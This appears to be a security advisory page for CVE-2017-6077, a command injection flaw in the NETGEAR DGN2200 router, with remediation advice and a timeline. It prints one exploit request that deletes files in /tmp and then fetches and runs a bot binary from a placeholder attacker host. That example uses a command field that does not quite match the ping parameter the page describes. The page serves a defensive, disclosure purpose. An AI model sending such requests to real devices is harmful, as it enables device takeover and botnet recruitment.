What Is NETGEAR DGN2200?
The NETGEAR DGN2200 is a DSL modem/wireless router designed for home and small business internet connectivity, incorporating ADSL2+ modem functionality with an 802.11n wireless access point. Like most consumer networking equipment, it includes a web-based management interface that provides diagnostic tools including ping and traceroute. The DGN2200 passes user-supplied ping target addresses directly to underlying OS commands without sanitization, enabling arbitrary command execution on the router.
Overview
CVE-2017-6077 is a critical OS command injection vulnerability in the NETGEAR DGN2200 wireless router. The router's diagnostics ping functionality passes the ping target parameter directly to a system command without sanitization or authentication, allowing an unauthenticated attacker to inject arbitrary shell commands that execute with root privileges on the router's embedded Linux system. Discovered by security researcher Paulos Yibelo in February 2017. CISA added CVE-2017-6077 to the KEV catalog in March 2022 reflecting ongoing IoT device exploitation campaigns.
Affected Versions
NETGEAR DGN2200 v1, v2, v3, and v4 hardware revisions — firmware versions prior to the patched release. Some hardware versions may be end-of-life with no available firmware update.
Technical Details
Root Cause: Unsanitized Input in Ping Diagnostic CGI
CVE-2017-6077 is an OS command injection vulnerability (CWE-78) in the NETGEAR DGN2200's web management interface. The router provides network diagnostic tools (ping, traceroute) accessible via its web UI. The ping diagnostic feature accepts an IP address or hostname from the user and passes it to a system-level ping command via a shell command constructor without sanitizing the input for shell metacharacters.
The vulnerable pattern:
system("ping -c 4 " + user_input)
By injecting shell metacharacters into the target address parameter, an attacker can append arbitrary commands:
GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://attacker/bot+-O+/tmp/bot;chmod+777+/tmp/bot;/tmp/bot&curpath=/¤tsetting.htm=1
The endpoint is accessible without authentication on many firmware versions, making exploitation trivial for any attacker with network access to the router management interface.
Attack Characteristics
| Attribute | Detail |
|---|---|
| Attack Vector | Network — unauthenticated HTTP request |
| Endpoint | Ping/diagnostics CGI page |
| Authentication | None required on vulnerable firmware |
| Impact | Root command execution on router |
| Common Payload | IoT botnet malware download and execution |
Discovery
Discovered by security researcher Paulos Yibelo and publicly disclosed in February 2017. NETGEAR published a knowledge base article (KB30476) and released firmware updates.
Exploitation Context
- IoT botnet recruitment: Consumer routers with command injection vulnerabilities are prime targets for Mirai, Gafgyt, and successor IoT botnets; automated internet-wide scanning tools find vulnerable routers and execute one-liner payloads to download and install bot malware within seconds of identification
- DDoS infrastructure: Compromised home routers contribute their upstream bandwidth to DDoS attacks; NETGEAR router vulnerabilities have been incorporated into multiple botnet families that generated terabit-scale DDoS attacks
- Proxy infrastructure: Nation-state threat actors (particularly those attributed to China) use compromised home and small business routers as proxy infrastructure for staging attacks against high-value targets — the US DOJ has documented Volt Typhoon specifically using compromised SOHO routers as a proxy network
- Persistent access: Router compromises persist through user reboots and internet disconnections; victims rarely notice, and routers are never "rebuilt" like PCs
- CISA KEV (2022): Added March 7, 2022 reflecting continued exploitation for botnet recruitment and as proxy infrastructure
Remediation
-
Apply NETGEAR firmware update — check NETGEAR's support site for DGN2200 firmware updates and apply the latest available version. Use the router admin interface's Firmware Update function.
-
Replace end-of-life hardware — if no firmware update is available for your hardware revision, replace the DGN2200 with a currently supported router model that receives security patches.
-
Disable remote management — ensure the DGN2200 management interface is not accessible from the internet (WAN side); disable Remote Management in the router settings to limit the attack surface to LAN-side access only.
-
Change default admin credentials — even after patching, change the router admin password from factory defaults and use a strong, unique password.
-
Check for compromise indicators — if the router may have been compromised, perform a factory reset (which removes malware from volatile storage on most routers) followed by immediate firmware update before re-enabling any services.
Key Details
| Property | Value |
|---|---|
| CVE ID | CVE-2017-6077 |
| Vendor / Product | NETGEAR — Wireless Router DGN2200 |
| NVD Published | 2017-02-22 |
| NVD Last Modified | 2025-10-22 |
| CVSS 3.1 Score | 9.8 |
| CVSS 3.1 Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| Severity | CRITICAL |
| CWE | CWE-78 — Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') find similar ↗ |
| CISA KEV Added | 2022-03-07 |
| CISA KEV Deadline | 2022-09-07 |
| Known Ransomware Use | No |
CVSS 3.1 Breakdown
Required Action
Timeline
| Date | Event |
|---|---|
| 2017-02-17 | Security researcher Paulos Yibelo discloses NETGEAR DGN2200 command injection vulnerability |
| 2017-02-22 | CVE-2017-6077 published by NVD |
| 2022-03-07 | Added to CISA Known Exploited Vulnerabilities catalog |
| 2022-09-07 | CISA BOD 22-01 remediation deadline |
References
| Resource | Type |
|---|---|
| NVD — CVE-2017-6077 | Vulnerability Database |
| CISA KEV Catalog Entry | US Government |
| NETGEAR KB — Ping and Traceroute Command Injection Security Vulnerability | Vendor Advisory |